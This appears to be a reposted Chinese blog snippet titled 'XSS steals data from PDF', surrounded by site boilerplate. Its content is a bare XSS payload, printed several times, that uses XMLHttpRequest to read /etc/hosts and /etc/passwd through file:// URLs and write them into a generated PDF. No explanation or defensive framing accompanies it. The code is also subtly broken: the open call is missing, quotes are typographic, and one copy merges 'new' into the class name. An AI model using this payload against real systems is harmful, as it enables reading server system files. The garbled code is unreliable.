XSS 从 PDF 中窃取数据

代码语言:javascript代码运行次数:0运行复制<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};(‘G

XSS 从 PDF 中窃取数据

代码语言:javascript代码运行次数:0运行复制
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};(‘GET’,’file:///etc/passwd’);x.send();</script> 

<script>x=newXMLHttpRequest;x.onload=function(){document.write(this.responseText)};(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};(‘GET’,’file:///etc/passwd’);x.send();</script>

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。原始发表:2025-04-28,如有侵权请联系 cloudcommunity@tencent 删除functionpdfscriptxss数据

发布者:admin,转转请注明出处:http://www.yc00.com/web/1747480686a4645519.html

相关推荐

  • XSS 从 PDF 中窃取数据

    代码语言:javascript代码运行次数:0运行复制<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};(‘G

    21小时前
    10

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信